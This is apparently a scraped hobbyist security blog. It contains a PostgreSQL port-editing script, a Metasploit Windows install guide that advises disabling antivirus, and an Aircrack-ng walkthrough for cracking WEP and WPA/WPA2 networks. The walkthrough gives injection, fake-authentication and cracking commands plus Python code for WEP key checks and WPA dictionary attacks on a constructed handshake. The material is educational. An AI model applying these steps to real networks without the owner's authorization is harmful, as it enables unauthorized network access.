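# pg_get_port FILE: print the first active (uncommented) port value, if any.
pg_get_port() {
    sed -n 's/^[[:space:]]*port[[:space:]]*=[[:space:]]*\([0-9][0-9]*\).*/\1/p' "$1" | head -n 1
}

# pg_set_port FILE PORT: copy FILE to FILE.bak, then rewrite only the number
# on the active port line (commented "#port = ..." lines and any trailing
# comment are left alone). Returns 1 for a non-numeric port or if no active
# port line was present.
pg_set_port() {
    file=$1
    port=$2
    case $port in
        ''|*[!0-9]*) echo "pg_set_port: port must be numeric" >&2; return 1 ;;
    esac
    cp "$file" "$file.bak" || return 1
    sed "s/^\([[:space:]]*port[[:space:]]*=[[:space:]]*\)[0-9][0-9]*/\1$port/" "$file.bak" > "$file"
    [ "$(pg_get_port "$file")" = "$port" ]
}

# Constructed excerpt in the layout of the "CONNECTIONS AND AUTHENTICATION"
# section the post tells you to scroll to.
DEMO_CONF=$(mktemp)
cat > "$DEMO_CONF" <<'EOF'
# CONNECTIONS AND AUTHENTICATION
#listen_addresses = 'localhost'     # what IP address(es) to listen on
port = 5432                         # (change requires restart)
max_connections = 100               # (change requires restart)
EOF

echo "before: port=$(pg_get_port "$DEMO_CONF")"
if pg_set_port "$DEMO_CONF" 7175; then
    echo "after:  port=$(pg_get_port "$DEMO_CONF") (backup in $DEMO_CONF.bak)"
else
    echo "no active port line found in $DEMO_CONF"
fi
```

The same restart the post mentions is still needed after the edit; the script only rewrites the file.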
<br />
Leave comments below, opinions, any help or questions. I'll be updating this to make it easier to read and adding in troubleshooting but hopefully it helps some people right now.<br />
<br />
<span style="font-size: x-large;"><u><b>Installing the Metasploit Framework on Windows!</b></u></span><br />
<br />
Yep, finally more Windows content, and this time I'm updating my old Metasploit installation tutorial to include Windows!<br />
Let's jump right in.<br />
<br />
First, download <a href="http://updates.metasploit.com/data/releases/framework-4.0.0-windows-full.exe">this file</a> and save it to wherever you want. It is the FULL version of Metasploit including an updated Java and Postgresql. I'm linking this one since a lot of people don't have the necessary dependencies already, and it's easier just to be safe than sorry and have to re-download it or it not work at all.<br />
Once this is done downloading (it took about 5 minutes with a fast connection for me), double click it from your downloaded area or in your browsers download page to run the executable (.exe) file.<br />
<br />
The setup is quite normal. Just hit next to go to the License Agreement and either read it and accept or just accept it (who actually reads them?).<br />
<br />
The next page is the installation location. I left mine at the default which for me is "C:\Program Files\Rapid7\framework" and works unless you want it in a specific location.<br />
Hit next and it will ask if you want automatic updates. I'd suggest saying yes since it allows you to have updated exploits and payloads and all the goodies we will be using. Now hit next until it installs (the next page is useless).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2TiV4ddP-d_oGZpulDT3FE2zcd_fLBb8ft43fQhnHwxsoJVkd3H50FATJeDp4OVktgwagaNSU60aLgsXdyYJM_3VMlsEJC7D-YWErNXvcp3Gn6Fgk5qM-HcD1tbb8_q8dLw1dcDpif9I/s1600/1+-+installing.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2TiV4ddP-d_oGZpulDT3FE2zcd_fLBb8ft43fQhnHwxsoJVkd3H50FATJeDp4OVktgwagaNSU60aLgsXdyYJM_3VMlsEJC7D-YWErNXvcp3Gn6Fgk5qM-HcD1tbb8_q8dLw1dcDpif9I/s400/1+-+installing.JPG" width="400" /></a></div>
The Metasploit Framework might open up a few Consoles, but they should close quickly and you should let them do their thing. This is the program installing normally.<br />
If you use Microsoft Security Essentials or some other type of virus protection, I would suggest turning it off for the installation, then adding Metasploit's install location to your "excluded locations," or else this happens:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3208A0klyEv4KZ91TISKGKdMMSAknVK5g6H4cOpAUg1QF8dOlMZUQ6qzaQVkUnKOWO0L89hzn3NMrv3NW5kU2Vuguv-AZiEP8_BX_Et-pCxi2yfWmDOiUw2DXBmf5zi7BqQRFLUI-xcI/s1600/2+-+microsoft+essentials+alert.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3208A0klyEv4KZ91TISKGKdMMSAknVK5g6H4cOpAUg1QF8dOlMZUQ6qzaQVkUnKOWO0L89hzn3NMrv3NW5kU2Vuguv-AZiEP8_BX_Et-pCxi2yfWmDOiUw2DXBmf5zi7BqQRFLUI-xcI/s400/2+-+microsoft+essentials+alert.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Oh noez D=</td></tr>
</tbody></table>
If this happens, allow the location by following the directions below and "allow" those files by changing them from "remove" to "allow" with the dropdown menu and hitting "apply actions"<br />
<br />
To allow this location on MSE, click on the "settings" tab, then "excluded files and locations" and select your location (for me, Program Files -> Rapid7).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVU0CxMgUYZ1lBomds5B71qHICkm3hoU0NQzmMeYJtUJJht65ugGNIBax3pk8sABjUbLk7uH8i6-NLJyjsIUXfR2cC21nCd55yaV99xo_BQNJvnn2UhAbZqNFsaWy0cdVig6FtefSQWS0/s1600/3+-+allowing+metasploit+mse.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVU0CxMgUYZ1lBomds5B71qHICkm3hoU0NQzmMeYJtUJJht65ugGNIBax3pk8sABjUbLk7uH8i6-NLJyjsIUXfR2cC21nCd55yaV99xo_BQNJvnn2UhAbZqNFsaWy0cdVig6FtefSQWS0/s400/3+-+allowing+metasploit+mse.JPG" width="400" /></a></div>
<br />
I would suggest allowing this location BEFORE continuing installation, as it may cause problems with the actual installation.<br />
Once it's done installing you can just hit finish and it should all be ready to go. It won't open up right away and for me, it didn't create a desktop shortcut. So go into your Start menu and All Programs, then Metasploit Framework and open the Metasploit GUI (graphical user interface) first.<br />
If it's the first time opening it, it should say it's configuring, just hit OK and let it load.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxeIjuFLB3JBXJ8888jzMs_12hNQerfLtkzLxKJdVhEEeTaat1A2wDJyBmZVfZeHyaDRH9T9bmgHCVkmyMha8mzmfXcCleW9k6JdH_ZQQJlCGozEDM_bEHrJsGodtFQVNBcQk2gd0s9ew/s1600/4+-+Opening+Metasploit.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxeIjuFLB3JBXJ8888jzMs_12hNQerfLtkzLxKJdVhEEeTaat1A2wDJyBmZVfZeHyaDRH9T9bmgHCVkmyMha8mzmfXcCleW9k6JdH_ZQQJlCGozEDM_bEHrJsGodtFQVNBcQk2gd0s9ew/s400/4+-+Opening+Metasploit.JPG" width="400" /></a></div>
<br />
This is the Metasploit GUI, which I will go over quickly before moving to the (better in my opinion) console interface, which is much like the Linux version.<br />
<br />
Wow, so where to begin? Let's start by clicking on the "File" menu dropdown and clicking on "Show connection details"<br />
This is our current "connection" to Metasploit, and it shows what port we are running off of, our username and password, as well as our "host," which for me is "127.0.0.1" which is localhost, which is <em>our</em> computer, if you didn't know.<br />
In our "view" tab we can click on any of the options and it will switch to the tabs above. The only option we can use here that isn't on the tabs (like Firefox, Chrome, Opera, or any browser today uses) is the "preferences" which includes a few different things we can change around.<br />
<br />
[Last updated August 8th at 1:00pm]<br />
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-42780914875299801612011-06-24T19:16:00.008-04:002022-12-20T10:46:31.663-05:00[OLD] Cracking WEP/WPA/2 networks with Aircrack-ng [Linux]<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" trbidi="on">
Now that you have hopefully installed the Aircrack-ng suite and familiarized yourself with some basic Linux commands, we can start cracking WEP and WPA1/2 networks to see the differences in security Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA) provide.<br />
<br />
<br />
<a name='more'></a><br />
<b>Notice: This is purely for educational value, do not attempt this on a network you do not PERSONALLY own. If you do this on a public or private network that you do not have authorization to do so on, it is illegal and you will probably get caught.</b><br />
<br />
Now, lets start. Open up a new terminal and lets begin (all typed commands are underlined; read the notes section for optional commands):<br />
<br />
<ol>
<li>Make sure you have a "monitoring" interface; this means that your network interface (the thing that interacts with networks) can scan for open/encrypted networks. <br />
To check what interfaces you have, type "iwconfig" into your terminal and it will list out which interfaces are currently up, and which mode they are in (look for "mode: managed" or "mode: monitor").<br />
Check out my <a href="http://hackavision.blogspot.com/2011/06/beginning-networking-in-ubuntu-linux.html">blog post about networking in Linux</a> for more on "iwconfig" and the different modes available.<br />
<br />
Type:<br />
<br />
<u>airmon-ng start [interface]</u><br />
<br />
if your interface is in "managed" or any other mode (ad-hoc, etc) it needs to be switched into monitor mode. Sometimes it will create a new interface for the monitoring, for example, my wireless is "wlan0" and it creates "wlan0mon" or "mon0" for monitoring. <br />
Once it is in "monitor" mode, you can begin.<br />
</li>
<li>Make sure you can inject packets into the chosen network. (Find a network with Kismet, which I'll review later, with your network manager, either Wicd or network-manager, or with the "airodump-ng [interface]" command in a new terminal; note that the last one creates a new .cap file.)<br />
Type:<br />
<br />
<u>aireplay-ng -9 -e [network name] -a [your MAC address] [interface]</u><br />
<br />
This makes sure that you can use your network card to input packets (data) into the targeted network. Your NIC (network interface card) must support injection.<br />
</li>
<li>If you can inject, start dumping captured IVs (Initialization Vectors) into a .cap (capture) file with command:<br />
<br />
<u>airodump-ng (-c x) --bssid [target network MAC] -w [output prefix] [interface]</u><br />
<br />
Note: -c x is channel x, where x is 1-11 and not necessary, although, if you know the channel, I would suggest doing the correct channel.<br />
This will bring up a nice interface with your targeted network, the BSSID (MAC that you entered), the "PWR," or how close you are (lower is better!), the "Beacons," which networks send automatically, the #Data, which is the data packets that have been sent over the network (which you have just started capturing!), the #/s which is data packets/s (higher is better for capturing faster!), the "CH," or channel (I'll go over this later), the "MB," the "ENC," or encryption (WEP/WPA/OPEN), the CIPHER (related to the ENC), the AUTH (pass-key or other), and finally the ESSID which is the English or ASCII network name that humans understand more easily than a Hex BSSID.<br />
<br />
</li>
<li>Now we have to do a "fake authentication" on the network. This is pretty self explanatory, but it authenticates you with the access point. If you didn't run this, the access point would return "deauthenticated" packets, not allowing you to inject packets back into the system.<br />
<br />
Type:<br />
<br />
<u>aireplay-ng -1 0 -e [network name] -a [target network MAC] -h [your MAC address] [interface]</u><br />
<br />
It should respond "Association successful :-)" if not, try again until it works.<br />
This may take a while, so don't fret if it doesn't work right away. I've had to do this three or four times or more with new terminals and locations until I finally got it, it's just luck sometimes.<br />
</li>
<li>Reinject ARP (Address Resolution Protocol) packets back into the network to create network activity. To review ARP, check out my <a href="http://www.hackavision.com/2011/07/what-is-arp-information.html">ARP information post</a> and read it thoroughly; it isn't long and gives a good explanation of what ARP is all about. What we're basically doing is sending fake messages to create data packets on the network so we can record and crack their password!<br />
<br />
Type:<br />
<br />
<u> aireplay-ng -3 -b [target network MAC] -h [your MAC address] [interface]</u><br />
<br />
It should say "Read xxxx packets (got xxxx ARP requests), sent xxxx packets..." and network activity should increase.<br />
</li>
<li>Crack the WEP key! Type:<br />
<br />
<u> aircrack-ng -b [target network MAC] *.cap</u><br />
<br />
Note: you can enter the ACTUAL file name instead of "*.cap" if you know it, or whatever "output prefix" you entered, then *.cap (all in a line, since it concatenates -xxxxx_xxxx after the prefix and before .cap).<br />
</li>
<li>Crack the WPA/WPA2 key (if you're not cracking WEP)! Type: <br />
<br />
<u> aircrack-ng -w [password list] -b [target network MAC] *.cap</u><br />
<br />
Note: You must have captured the WPA handshake, and again, substitute your capture file accordingly.</li>
</ol>
For WEP cracking, this should show "Tested xxxx keys (got xxxx IVs)" with a bunch of hex gibberish underneath. You can run this while you inject packets; aircrack-ng periodically re-reads the capture file and retries as the IV count grows. It should find the key eventually unless the network admin or creator disconnects the network or you go out of range of it. The number that matters is the IV count, not the number of tested keys: sometimes as few as 5,000 IVs will do, other times it needs 250,000 or more (the default PTW attack typically wants tens of thousands of IVs for a 128-bit key).<br />
My record is about 2-3 minutes while sitting on a toilet in a flea market; it's fun to see how quickly WEP is broken, <b>so remember ALWAYS use WPA2 with a non-dictionary passkey.</b> You can review more tips about securing your home network at my post <a href="http://www.hackavision.com/2011/07/securing-your-personal-home-network.html">here</a>.<br />
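The "Tested xxxx keys" counter above is aircrack-ng checking candidate keys one at a time. The following is an added example, written for this post and not taken from the aircrack-ng source, of what that per-candidate check is: seed RC4 with the frame's IV followed by the candidate key, decrypt the captured body, and accept the key only if the trailing ICV matches CRC-32 of the recovered plaintext. The statistical part (choosing likely key bytes from the IVs) is not shown; the key, IVs and frames are constructed inside the file and are not a real capture.

```python
"""Added example (not from the original post or the aircrack-ng code): the
check behind aircrack-ng's "Tested N keys" counter. A candidate WEP key is
accepted only if RC4(IV || key) decrypts a captured data frame to a body
whose trailing ICV equals CRC-32 of the plaintext. The statistical part of
the attack (picking likely key bytes from the IVs) is not shown here; this
is only the per-candidate verification. The frames below are constructed in
this file, not captured from a real network."""
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA). WEP seeds it with the 3-byte IV followed by the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian on the wire."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Body of a WEP data frame: IV (3) || key index (1) || RC4(IV||key, plaintext || ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_check_key(key: bytes, frame_body: bytes) -> bool:
    """Decrypt one frame with the candidate key and see whether the ICV checks out."""
    iv, ciphertext = frame_body[:3], frame_body[4:]
    decrypted = rc4(iv + key, ciphertext)
    return icv(decrypted[:-4]) == decrypted[-4:]


def wep_crack(candidates, frames):
    """Accept a candidate only if every captured frame verifies: a single frame gives a
    wrong key a 2**-32 chance of passing, so check several before believing the result."""
    for key in candidates:
        if all(wep_check_key(key, frame) for frame in frames):
            return key
    return None


# Constructed scenario: a hypothetical 40-bit key and a few "captured" frames whose
# plaintext is an LLC/SNAP header followed by a short ARP-style payload.
TRUE_KEY = bytes.fromhex("0102030405")
_PLAINTEXTS = [
    bytes.fromhex("aaaa030000000806") + b"\x00\x01\x08\x00\x06\x04\x00\x01" + bytes(20),
    bytes.fromhex("aaaa030000000800") + bytes(range(40)),
    bytes.fromhex("aaaa030000000806") + b"\x00\x01\x08\x00\x06\x04\x00\x02" + bytes(range(20, 40)),
]
FRAMES = [wep_encrypt(TRUE_KEY, iv, pt)
          for iv, pt in zip([b"\xfb\x02\x9e", b"\x01\x02\x03", b"\xff\xfe\xfd"], _PLAINTEXTS)]
CANDIDATES = [bytes.fromhex(h) for h in ("0000000000", "1234567890", "0102030405", "deadbeef00")]


def recovered_key(candidates=CANDIDATES, frames=FRAMES):
    """Run the candidate list against the constructed frames; returns the 5-byte key."""
    return wep_crack(candidates, frames)
```

Two things worth noticing: the IV is sent in the clear in front of every frame, which is why airodump-ng can count them and why reusing a 24-bit IV space with RC4 is the whole problem; and a single CRC-32 check is a weak acceptance test, which is why the example (and aircrack-ng) wants several frames before declaring a key found.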
<br />
For WPA/WPA2 cracking, aircrack-ng runs through a wordlist (BackTrack 5 ships darkc0de.lst, with roughly a million passwords or more) and tests every entry against the captured handshake. Each candidate has to be run through PBKDF2 (4096 rounds of HMAC-SHA1, salted with the network name) to get a Pairwise Master Key before the handshake MIC can be checked, so this takes quite a bit longer than WEP, and if the passphrase is not in the list it is impossible to recover through this method. <br />
<br />
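To show what "checks every one for a match" means, here is an added example, written for this post and not taken from the aircrack-ng source, of the test aircrack-ng -w performs for each wordlist entry against a captured four-way handshake: derive the PMK with PBKDF2, expand it to the PTK with the 802.11i PRF over the two MAC addresses and nonces, take the first 16 bytes as the KCK, and recompute the MIC of handshake message 2. The MAC addresses, nonces and EAPOL frame are constructed in the file and are hypothetical; the SSID/passphrase pair ("IEEE"/"password") is the IEEE 802.11i Annex test vector, so the PMK step can be checked against a published value.

```python
"""Added example (not from the original post or the aircrack-ng code): what
"aircrack-ng -w wordlist" actually checks for each candidate passphrase.

Per candidate: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes),
PTK = PRF-512(PMK, "Pairwise key expansion", MACs and nonces), KCK = PTK[:16],
then the MIC of handshake message 2 is recomputed with the KCK and compared to
the captured one. The handshake below is constructed in this file, not
captured from a real network."""
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK derivation from 802.11i; the 4096 rounds are what make WPA cracking slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: HMAC-SHA1 in counter mode over the sorted MACs and nonces."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    blocks = [hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, wpa2: bool = True) -> bytes:
    """Key MIC: HMAC-SHA1 truncated to 16 bytes for WPA2/CCMP, HMAC-MD5 for WPA/TKIP.
    The frame must have its 16-byte MIC field zeroed before hashing."""
    alg = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_mic_zeroed, alg).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """A minimal EAPOL-Key message 2 (RSN, CCMP, no RSN IE) with the MIC field zeroed.
    The MIC field sits at offset 81: 4-byte EAPOL header + 77 bytes of key descriptor."""
    body = (b"\x02"                            # descriptor type: RSN key descriptor
            + b"\x01\x0a"                      # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + b"\x00\x10"                      # key length: 16 (CCMP)
            + (1).to_bytes(8, "big")           # replay counter
            + snonce                           # 32-byte supplicant nonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID (unused here)
            + bytes(16)                        # key MIC, zeroed
            + b"\x00\x00")                     # key data length 0 (a real client sends its RSN IE here)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def crack_wpa(wordlist, ssid, ap_mac, client_mac, anonce, snonce, eapol_mic_zeroed, captured_mic):
    """The dictionary attack: returns the passphrase whose derived KCK reproduces the MIC, or None."""
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), captured_mic):
            return candidate
    return None


# Constructed scenario (hypothetical MACs and nonces). The SSID/passphrase pair is the
# IEEE 802.11i Annex test vector, so wpa_pmk can be checked against a published value.
SSID = "IEEE"
TRUE_PASSPHRASE = "password"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = build_eapol_msg2(SNONCE)
# What the legitimate client would have sent as the MIC (this stands in for the capture).
CAPTURED_MIC = eapol_mic(
    wpa_ptk(wpa_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16], EAPOL_MSG2)
WORDLIST = ["letmein", "12345678", "password", "hunter2"]


def recovered_passphrase(wordlist=WORDLIST):
    """Run the wordlist against the constructed handshake; returns the passphrase or None."""
    return crack_wpa(wordlist, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, EAPOL_MSG2, CAPTURED_MIC)
```

Everything the attacker needs (SSID, both MAC addresses, both nonces, and message 2 with its MIC) is sent in the clear during the handshake, which is why one captured handshake is enough and why the only real defence is a passphrase that no wordlist contains. The PBKDF2 call is also the reason airolib-ng precomputes PMKs per ESSID: the salt is the network name, so the expensive step can be done once per SSID and reused.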
For further in-depth reading on cracking WEP networks, check out <a href="http://eprint.iacr.org/2007/120.pdf">this paper</a>.<br />
The aircrack-ng suite includes the programs below; try playing around with them. Running any of them with --help or -h (almost always) prints a help page listing all of its options.<br />
<br />
<ul>
<li>aircrack-ng: cracks WEP keys and WPA/WPA2 pre-shared keys (dictionary attack).</li>
<li>airdecap-ng: decrypts WEP- or WPA-encrypted capture files with a known key.</li>
<li>airmon-ng: puts wireless cards into monitor mode.</li>
<li>aireplay-ng: packet injector (Linux, and Windows with CommView drivers).</li>
<li>airodump-ng: packet sniffer; writes captured traffic to PCAP or IVS files and shows information about networks and clients.</li>
<li>airtun-ng: virtual tunnel interface creator.</li>
<li>airolib-ng: stores and manages ESSID and password lists and precomputes Pairwise Master Keys, which raises the keys-per-second rate of WPA attacks.</li>
<li>packetforge-ng: creates encrypted packets for injection.</li>
<li>Tools (ivstools and friends): utilities to merge and convert capture files.</li>
<li>airbase-ng: techniques for attacking clients rather than access points (for example, acting as a fake access point).</li>
<li>airdecloak-ng: removes WEP cloaking from pcap files.</li>
<li>airdriver-ng: tools for managing wireless drivers.</li>
<li>airserv-ng: lets other computers use the wireless card over the network.</li>
<li>buddy-ng: the helper server for easside-ng, run on a remote computer.</li>
<li>easside-ng: a tool for communicating with an access point without the WEP key.</li>
<li>tkiptun-ng: WPA/TKIP attack.</li>
<li>wesside-ng: automatic tool for recovering a WEP key.</li>
</ul>
<br />
Last updated at 10:30am on July 27th, 2011.</div>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.com